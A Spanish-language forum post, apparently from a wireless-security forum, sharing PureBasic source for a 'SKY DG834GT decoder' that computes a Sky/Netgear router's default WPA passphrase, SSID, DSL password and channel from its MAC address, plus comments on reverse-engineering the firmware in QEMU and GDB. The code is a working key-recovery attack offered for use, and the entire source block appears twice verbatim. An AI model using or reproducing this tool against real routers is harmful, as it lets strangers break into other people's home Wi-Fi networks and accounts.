Autor
Desde el foro wireless de remote-exploit (los del BackTrack):
http://forums.remote-exploit.org/wireless/19462-default-wpa-keys-3.html#post132057
Parece que le han metido mano al Netgear y sacado el algoritmo por el cual se genera la clave WPA por defecto.
Código del SKY DG834GT decoder v1.0 disponible en el mismo post
Un saludo
ChimoC
P.D.: Gracias al user Mambostar de la página de seguridadwireless por pasarnos la información
Código:
; SKY DG834GT decoder v1.0
; 6th May 2009
;
; Ref: (no url yet)
; Please note that the following is sloppy coding, my brain is fried. I didn't actually
; achieve any result by viewing the MIPS assembler functions of the router binaries, but this is
; where I started: I have Ubuntu installed and the QEMU emulator, running MIPS (Debian)
; Snip (no url yet)
; (The Debian Etch MIPS small) - rest of the instructions are on that page.
;
; Once up And running I install GDB And place the SKY router binary 'RC' (usr/sbin/rc) on a webserver
; where I can 'wget' it To the emulated MIPS environment. The binaries for the router can be found
; here: (snip)
; The file you're after is: DG834GT-1SKUK (For Firmware Version 1.02.28) - within that archive
; is target.tar.bz2 - unpack that and you'll find the RC binary.
;
; You'll also have to copy some libs over from that target archive to your /lib/ directory...
; ld-uClibc-0.9.28.so
; ld-uClibc.so.0
; libc.so.0
; libuClibc-0.9.28.so
; else the RC binary will appear to not function.
; Make sure to CHMOD 777 the libs and RC binary.
;
; After failing badly to understand any of the code of RC using GDB,
; I found another way. In the QEMU emulator I renamed my MD5SUM to MD5SUM2, then copied
; my 'more' command to 'MD5SUM' (find them using the 'whereis' command). Effectively, this lets
; GDB run the RC file without creating an MD5SUM. You create it yourself. It still calls MD5SUM, but
; doesn't realise it's calling 'more' instead. So what it's doing it echoing your personalised MAC
; file to itself and creating the password/phrase/etc into the newly created nvram file. With this
; method you can trial and error to find algorithm combinations.
;
; GDB: shell echo -n 00000000000000000000000000000000 >mac
; GDB: file rc
; GDB: start
; GDB jump EzPassword
; GDB: shell more nvram
;
; To get this to work correctly you have to type 'start' in GDB before every attempt. Values for
; nvram include: EzPassword, EzSSID, EzChannel, EzPassphrase (all of which can be jumped to, see above)
;
; Purebasic source requires Droopy Library for hex2dec function
; Window functions derived from public domain source by 'Kale'.
; DG934G v2 SKY router uses the serial on the router itself,
; which is added To the tmp/mac file As: 1a1b1c2a2d2f-12345678...
; (I think!) - trying this out on norm360's data brings the correct
; password etc but not the correct Passphrase. Working on it.
; Ref: (snip)
; Haven't looked at the v3 router yet.
; I think this is all right, my brain is mince, as I said.
; The following is to set the window/button setup
; which I can't explain well, since I took and modified the code
; from public domain archives
#Window_0 = 0
#Window_1 = 1
#Gadget_0 = 0
#Gadget_1 = 1
#Gadget_2 = 2
#Gadget_3 = 3
#Gadget_4 = 4
#Gadget_5 = 5
#Gadget_6 = 6
#Gadget_7 = 7
Procedure AddText()
existingText.s = GetGadgetText(#Gadget_0)
If existingText = ""
SetGadgetText(#Gadget_0, GetGadgetText(#Gadget_1))
Else
SetGadgetText(#Gadget_0, existingText + Chr(13) + Chr(10) + GetGadgetText(#Gadget_1))
EndIf
lines = SendMessage_(GadgetID(0),#EM_GETLINECOUNT,0,0)
SendMessage_(GadgetID(#Gadget_0), #EM_LINESCROLL, 0, lines)
EndProcedure
If OpenWindow(#Window_0, 5, 5, 690, 300, "Sky v1.0 - DG834GT", #PB_Window_MinimizeGadget | #PB_Window_MaximizeGadget | #PB_Window_SystemMenu | #PB_Window_ScreenCentered )
If CreateGadgetList(WindowID(#Window_0))
EditorGadget(#Gadget_0, 5, 5, 680, 254, #ES_MULTILINE | #ES_AUTOVSCROLL | #ES_AUTOHSCROLL | #WS_VSCROLL )
StringGadget(#Gadget_1, 5, 270, 250, 21, "")
ButtonGadget(#Gadget_2, 270, 270, 65, 22, "Go")
ButtonGadget(#Gadget_3, 340, 270, 65, 22, "Info")
ButtonGadget(#Gadget_4, 410, 270, 65, 22, "Null1")
ButtonGadget(#Gadget_5, 480, 270, 65, 22, "Null2")
ButtonGadget(#Gadget_6, 550, 270, 65, 22, "Null3")
ButtonGadget(#Gadget_7, 620, 270, 65, 22, "Null4")
EndIf
EndIf
Repeat
Event = WaitWindowEvent()
Select Event
Case #PB_Event_Gadget
Select EventGadget()
; Button Go is pressed
Case #Gadget_2
If GetGadgetText(#Gadget_1) <> ""
mac$=GetGadgetText(#Gadget_1)
Gosub pro
EndIf
SetGadgetText(#Gadget_0,"")
SetGadgetText(#Gadget_0,all$)
SetGadgetText(#Gadget_1,"")
; Button Read Me is pressed
Case #Gadget_3
mystring.s = PeekS(? source)
SetGadgetText(0, mystring.s)
EndSelect
EndSelect
Until Event = #PB_Event_CloseWindow
End
pro:; Main routine to grab everything from the hash
; Uppercases your mac and removes the : colons if entered
; No other checks on the mac are done in this version
mac$=UCase(RemoveString(mac$,":"))
; Purebasic inbuilt md5sum routine
; If doing an MD5SUM in Linux, create your /tmp/mac file with
; echo -n 1a2b3c4d5e6f >mac - Make sure to use the n flag
hash$=MD5Fingerprint(@mac$, Len(mac$))
; This takes 5 double-char hex characters from the MAC
; starting with position 1 - example (MD5SUM for 112233445566):
; eb341820cd3a3485461a61b1e97d31b1 - split this to
; eb 34 18 20 cd
; Then split from position 15, 10 characters again:
; 85 46 1a 61 b1
; I then converted the first five to decimal, then
; the second five and added eb + 85, 34 + 46, etc
; Converted them back to hex and then converting again to 2-digit hex
; (first sum of eb + 85 = 170, so becomes 70)
; Place all of your 5 sums together in one line to
; create the password:
; 70 7a 32 81 7e -> 707a32817e
; I did try adding eb341820cd + 85461a61b1 but the result
; was wrong, maybe it was my math, or the routine, or maybe
; it just can't be done that way, I don't know.
a1=Hex2Dec(Mid(hash$,1,2))
a2=Hex2Dec(Mid(hash$,3,2))
a3=Hex2Dec(Mid(hash$,5,2))
a4=Hex2Dec(Mid(hash$,7,2))
a5=Hex2Dec(Mid(hash$,9,2))
b1=Hex2Dec(Mid(hash$,15,2))
b2=Hex2Dec(Mid(hash$,17,2))
b3=Hex2Dec(Mid(hash$,19,2))
b4=Hex2Dec(Mid(hash$,21,2))
b5=Hex2Dec(Mid(hash$,23,2))
sum1$=Right(Hex(a1+b1),2)
sum2$=Right(Hex(a2+b2),2)
sum3$=Right(Hex(a3+b3),2)
sum4$=Right(Hex(a4+b4),2)
sum5$=Right(Hex(a5+b5),2)
password$=LCase(sum1$+sum2$+sum3$+sum4$+sum5$+sum6$)
; The following creates an array for easy lookup of the Passphrase.
; 00 = A, 01 = B, 02 = C, etc until Z is reached,
; then we kick back to A: 19 = Z, 1a = A, 1b = B
; The 8 hex values for the Passphrase can be found in the hash
; at these locations:
; Position 3,7,11,15,19,23,27,31 - an example using 1's and 0's,
; where the 1's are the Passphrase hex values:
; 00110011001100110011001100110011
; So if the above MD5SUM = 00990011001100110011001100110011
; Then via the array-lookup, the Passphrase is:XRRRRRRR
; X=99, R=11
Dim phrasearray.s(255)
a=65
For i = 0 To 255
letter$=Chr(a)
find$=LCase(RSet(Hex(i),2,"0"))+" "+letter$
phrasearray(i)=find$
a=a+1
If a=91 : a=65 :EndIf
Next
p1=Hex2Dec(Mid(hash$,3,2))
phrase$+Mid(phrasearray(p1),4,1)
p2=Hex2Dec(Mid(hash$,7,2))
phrase$+Mid(phrasearray(p2),4,1)
p3=Hex2Dec(Mid(hash$,11,2))
phrase$+Mid(phrasearray(p3),4,1)
p4=Hex2Dec(Mid(hash$,15,2))
phrase$+Mid(phrasearray(p4),4,1)
p5=Hex2Dec(Mid(hash$,19,2))
phrase$+Mid(phrasearray(p5),4,1)
p6=Hex2Dec(Mid(hash$,23,2))
phrase$+Mid(phrasearray(p6),4,1)
p7=Hex2Dec(Mid(hash$,27,2))
phrase$+Mid(phrasearray(p7),4,1)
p8=Hex2Dec(Mid(hash$,31,2))
phrase$+Mid(phrasearray(p8),4,1)
; The SSID array is created as above, where
; a hex value of 00=0 and 09=9. When it reaches 9
; the array kicks back To 0, so 0a = 0
; The hex positions in the MD5SUM are found
; at 23,25,27,29,31
; Example: 0102031a1b = 12367
Dim ssidarray.s(255)
a=48
For i = 0 To 255
digit$=Chr(a)
find$=LCase(RSet(Hex(i),2,"0"))+" "+digit$
ssidarray(i)=find$
a=a+1
If a=58 : a=48 :EndIf
Next
s1=Hex2Dec(Mid(hash$,23,2))
ssid$+Mid(ssidarray(s1),4,1)
s2=Hex2Dec(Mid(hash$,25,2))
ssid$+Mid(ssidarray(s2),4,1)
s3=Hex2Dec(Mid(hash$,27,2))
ssid$+Mid(ssidarray(s3),4,1)
s4=Hex2Dec(Mid(hash$,29,2))
ssid$+Mid(ssidarray(s4),4,1)
s5=Hex2Dec(Mid(hash$,31,2))
ssid$+Mid(ssidarray(s5),4,1)
; Channel array same as above, but it appears
; they only use channels 1,6 and 11 - so the array
; creates 00=1, 01=6, 02=11, 03 =1, 04=6, etc.
; Channel hex in the MD5SUM is found at position 31 (last two
; characters of the MD5SUM)
Dim channelarray.s(255)
a=1
For i = 0 To 255
find$=LCase(RSet(Hex(i),2,"0"))+" "+Str(a)
channelarray(i)=find$
a=a+5
If a>12 : a=1 :EndIf
Next
s1=Hex2Dec(Mid(hash$,31,2))
channel$+Mid(channelarray(s1),4,1)
;Dump them all into variables
x$=Chr(13)+Chr(10)
a$="MD5SUM: "+hash$
b$="Username: "+mac$+"@skydsl"
c$="Password: "+password$
d$="Passphrase: "+phrase$
e$="SSID: SKY"+ssid$
f$="Channel: "+channel$
; Dump all of the above into a shorter single line with breaks
all$= a$+x$+b$+x$+c$+x$+d$+x$+e$+x$+f$
; Reset some stuff
hash$=""
mac$=""
password$=""
phrase$=""
channel$=""
ssid$=""
find$=""
Return
; Includes this source file into the Purebasic executable
DataSection
source : IncludeBinary "source.txt" + Chr(0)
phrasearray : IncludeBinary "phrasearray.txt" + Chr(0)
ssidarray : IncludeBinary "ssidarray.txt" + Chr(0)
channelarray : IncludeBinary "channelarray.txt" + Chr(0)
EndDataSection
; 6th May 2009
;
; Ref: (no url yet)
; Please note that the following is sloppy coding, my brain is fried. I didn't actually
; achieve any result by viewing the MIPS assembler functions of the router binaries, but this is
; where I started: I have Ubuntu installed and the QEMU emulator, running MIPS (Debian)
; Snip (no url yet)
; (The Debian Etch MIPS small) - rest of the instructions are on that page.
;
; Once up And running I install GDB And place the SKY router binary 'RC' (usr/sbin/rc) on a webserver
; where I can 'wget' it To the emulated MIPS environment. The binaries for the router can be found
; here: (snip)
; The file you're after is: DG834GT-1SKUK (For Firmware Version 1.02.28) - within that archive
; is target.tar.bz2 - unpack that and you'll find the RC binary.
;
; You'll also have to copy some libs over from that target archive to your /lib/ directory...
; ld-uClibc-0.9.28.so
; ld-uClibc.so.0
; libc.so.0
; libuClibc-0.9.28.so
; else the RC binary will appear to not function.
; Make sure to CHMOD 777 the libs and RC binary.
;
; After failing badly to understand any of the code of RC using GDB,
; I found another way. In the QEMU emulator I renamed my MD5SUM to MD5SUM2, then copied
; my 'more' command to 'MD5SUM' (find them using the 'whereis' command). Effectively, this lets
; GDB run the RC file without creating an MD5SUM. You create it yourself. It still calls MD5SUM, but
; doesn't realise it's calling 'more' instead. So what it's doing it echoing your personalised MAC
; file to itself and creating the password/phrase/etc into the newly created nvram file. With this
; method you can trial and error to find algorithm combinations.
;
; GDB: shell echo -n 00000000000000000000000000000000 >mac
; GDB: file rc
; GDB: start
; GDB jump EzPassword
; GDB: shell more nvram
;
; To get this to work correctly you have to type 'start' in GDB before every attempt. Values for
; nvram include: EzPassword, EzSSID, EzChannel, EzPassphrase (all of which can be jumped to, see above)
;
; Purebasic source requires Droopy Library for hex2dec function
; Window functions derived from public domain source by 'Kale'.
; DG934G v2 SKY router uses the serial on the router itself,
; which is added To the tmp/mac file As: 1a1b1c2a2d2f-12345678...
; (I think!) - trying this out on norm360's data brings the correct
; password etc but not the correct Passphrase. Working on it.
; Ref: (snip)
; Haven't looked at the v3 router yet.
; I think this is all right, my brain is mince, as I said.
; The following is to set the window/button setup
; which I can't explain well, since I took and modified the code
; from public domain archives
#Window_0 = 0
#Window_1 = 1
#Gadget_0 = 0
#Gadget_1 = 1
#Gadget_2 = 2
#Gadget_3 = 3
#Gadget_4 = 4
#Gadget_5 = 5
#Gadget_6 = 6
#Gadget_7 = 7
Procedure AddText()
existingText.s = GetGadgetText(#Gadget_0)
If existingText = ""
SetGadgetText(#Gadget_0, GetGadgetText(#Gadget_1))
Else
SetGadgetText(#Gadget_0, existingText + Chr(13) + Chr(10) + GetGadgetText(#Gadget_1))
EndIf
lines = SendMessage_(GadgetID(0),#EM_GETLINECOUNT,0,0)
SendMessage_(GadgetID(#Gadget_0), #EM_LINESCROLL, 0, lines)
EndProcedure
If OpenWindow(#Window_0, 5, 5, 690, 300, "Sky v1.0 - DG834GT", #PB_Window_MinimizeGadget | #PB_Window_MaximizeGadget | #PB_Window_SystemMenu | #PB_Window_ScreenCentered )
If CreateGadgetList(WindowID(#Window_0))
EditorGadget(#Gadget_0, 5, 5, 680, 254, #ES_MULTILINE | #ES_AUTOVSCROLL | #ES_AUTOHSCROLL | #WS_VSCROLL )
StringGadget(#Gadget_1, 5, 270, 250, 21, "")
ButtonGadget(#Gadget_2, 270, 270, 65, 22, "Go")
ButtonGadget(#Gadget_3, 340, 270, 65, 22, "Info")
ButtonGadget(#Gadget_4, 410, 270, 65, 22, "Null1")
ButtonGadget(#Gadget_5, 480, 270, 65, 22, "Null2")
ButtonGadget(#Gadget_6, 550, 270, 65, 22, "Null3")
ButtonGadget(#Gadget_7, 620, 270, 65, 22, "Null4")
EndIf
EndIf
Repeat
Event = WaitWindowEvent()
Select Event
Case #PB_Event_Gadget
Select EventGadget()
; Button Go is pressed
Case #Gadget_2
If GetGadgetText(#Gadget_1) <> ""
mac$=GetGadgetText(#Gadget_1)
Gosub pro
EndIf
SetGadgetText(#Gadget_0,"")
SetGadgetText(#Gadget_0,all$)
SetGadgetText(#Gadget_1,"")
; Button Read Me is pressed
Case #Gadget_3
mystring.s = PeekS(? source)
SetGadgetText(0, mystring.s)
EndSelect
EndSelect
Until Event = #PB_Event_CloseWindow
End
pro:; Main routine to grab everything from the hash
; Uppercases your mac and removes the : colons if entered
; No other checks on the mac are done in this version
mac$=UCase(RemoveString(mac$,":"))
; Purebasic inbuilt md5sum routine
; If doing an MD5SUM in Linux, create your /tmp/mac file with
; echo -n 1a2b3c4d5e6f >mac - Make sure to use the n flag
hash$=MD5Fingerprint(@mac$, Len(mac$))
; This takes 5 double-char hex characters from the MAC
; starting with position 1 - example (MD5SUM for 112233445566):
; eb341820cd3a3485461a61b1e97d31b1 - split this to
; eb 34 18 20 cd
; Then split from position 15, 10 characters again:
; 85 46 1a 61 b1
; I then converted the first five to decimal, then
; the second five and added eb + 85, 34 + 46, etc
; Converted them back to hex and then converting again to 2-digit hex
; (first sum of eb + 85 = 170, so becomes 70)
; Place all of your 5 sums together in one line to
; create the password:
; 70 7a 32 81 7e -> 707a32817e
; I did try adding eb341820cd + 85461a61b1 but the result
; was wrong, maybe it was my math, or the routine, or maybe
; it just can't be done that way, I don't know.
a1=Hex2Dec(Mid(hash$,1,2))
a2=Hex2Dec(Mid(hash$,3,2))
a3=Hex2Dec(Mid(hash$,5,2))
a4=Hex2Dec(Mid(hash$,7,2))
a5=Hex2Dec(Mid(hash$,9,2))
b1=Hex2Dec(Mid(hash$,15,2))
b2=Hex2Dec(Mid(hash$,17,2))
b3=Hex2Dec(Mid(hash$,19,2))
b4=Hex2Dec(Mid(hash$,21,2))
b5=Hex2Dec(Mid(hash$,23,2))
sum1$=Right(Hex(a1+b1),2)
sum2$=Right(Hex(a2+b2),2)
sum3$=Right(Hex(a3+b3),2)
sum4$=Right(Hex(a4+b4),2)
sum5$=Right(Hex(a5+b5),2)
password$=LCase(sum1$+sum2$+sum3$+sum4$+sum5$+sum6$)
; The following creates an array for easy lookup of the Passphrase.
; 00 = A, 01 = B, 02 = C, etc until Z is reached,
; then we kick back to A: 19 = Z, 1a = A, 1b = B
; The 8 hex values for the Passphrase can be found in the hash
; at these locations:
; Position 3,7,11,15,19,23,27,31 - an example using 1's and 0's,
; where the 1's are the Passphrase hex values:
; 00110011001100110011001100110011
; So if the above MD5SUM = 00990011001100110011001100110011
; Then via the array-lookup, the Passphrase is:XRRRRRRR
; X=99, R=11
Dim phrasearray.s(255)
a=65
For i = 0 To 255
letter$=Chr(a)
find$=LCase(RSet(Hex(i),2,"0"))+" "+letter$
phrasearray(i)=find$
a=a+1
If a=91 : a=65 :EndIf
Next
p1=Hex2Dec(Mid(hash$,3,2))
phrase$+Mid(phrasearray(p1),4,1)
p2=Hex2Dec(Mid(hash$,7,2))
phrase$+Mid(phrasearray(p2),4,1)
p3=Hex2Dec(Mid(hash$,11,2))
phrase$+Mid(phrasearray(p3),4,1)
p4=Hex2Dec(Mid(hash$,15,2))
phrase$+Mid(phrasearray(p4),4,1)
p5=Hex2Dec(Mid(hash$,19,2))
phrase$+Mid(phrasearray(p5),4,1)
p6=Hex2Dec(Mid(hash$,23,2))
phrase$+Mid(phrasearray(p6),4,1)
p7=Hex2Dec(Mid(hash$,27,2))
phrase$+Mid(phrasearray(p7),4,1)
p8=Hex2Dec(Mid(hash$,31,2))
phrase$+Mid(phrasearray(p8),4,1)
; The SSID array is created as above, where
; a hex value of 00=0 and 09=9. When it reaches 9
; the array kicks back To 0, so 0a = 0
; The hex positions in the MD5SUM are found
; at 23,25,27,29,31
; Example: 0102031a1b = 12367
Dim ssidarray.s(255)
a=48
For i = 0 To 255
digit$=Chr(a)
find$=LCase(RSet(Hex(i),2,"0"))+" "+digit$
ssidarray(i)=find$
a=a+1
If a=58 : a=48 :EndIf
Next
s1=Hex2Dec(Mid(hash$,23,2))
ssid$+Mid(ssidarray(s1),4,1)
s2=Hex2Dec(Mid(hash$,25,2))
ssid$+Mid(ssidarray(s2),4,1)
s3=Hex2Dec(Mid(hash$,27,2))
ssid$+Mid(ssidarray(s3),4,1)
s4=Hex2Dec(Mid(hash$,29,2))
ssid$+Mid(ssidarray(s4),4,1)
s5=Hex2Dec(Mid(hash$,31,2))
ssid$+Mid(ssidarray(s5),4,1)
; Channel array same as above, but it appears
; they only use channels 1,6 and 11 - so the array
; creates 00=1, 01=6, 02=11, 03 =1, 04=6, etc.
; Channel hex in the MD5SUM is found at position 31 (last two
; characters of the MD5SUM)
Dim channelarray.s(255)
a=1
For i = 0 To 255
find$=LCase(RSet(Hex(i),2,"0"))+" "+Str(a)
channelarray(i)=find$
a=a+5
If a>12 : a=1 :EndIf
Next
s1=Hex2Dec(Mid(hash$,31,2))
channel$+Mid(channelarray(s1),4,1)
;Dump them all into variables
x$=Chr(13)+Chr(10)
a$="MD5SUM: "+hash$
b$="Username: "+mac$+"@skydsl"
c$="Password: "+password$
d$="Passphrase: "+phrase$
e$="SSID: SKY"+ssid$
f$="Channel: "+channel$
; Dump all of the above into a shorter single line with breaks
all$= a$+x$+b$+x$+c$+x$+d$+x$+e$+x$+f$
; Reset some stuff
hash$=""
mac$=""
password$=""
phrase$=""
channel$=""
ssid$=""
find$=""
Return
; Includes this source file into the Purebasic executable
DataSection
source : IncludeBinary "source.txt" + Chr(0)
phrasearray : IncludeBinary "phrasearray.txt" + Chr(0)
ssidarray : IncludeBinary "ssidarray.txt" + Chr(0)
channelarray : IncludeBinary "channelarray.txt" + Chr(0)
EndDataSection
En línea
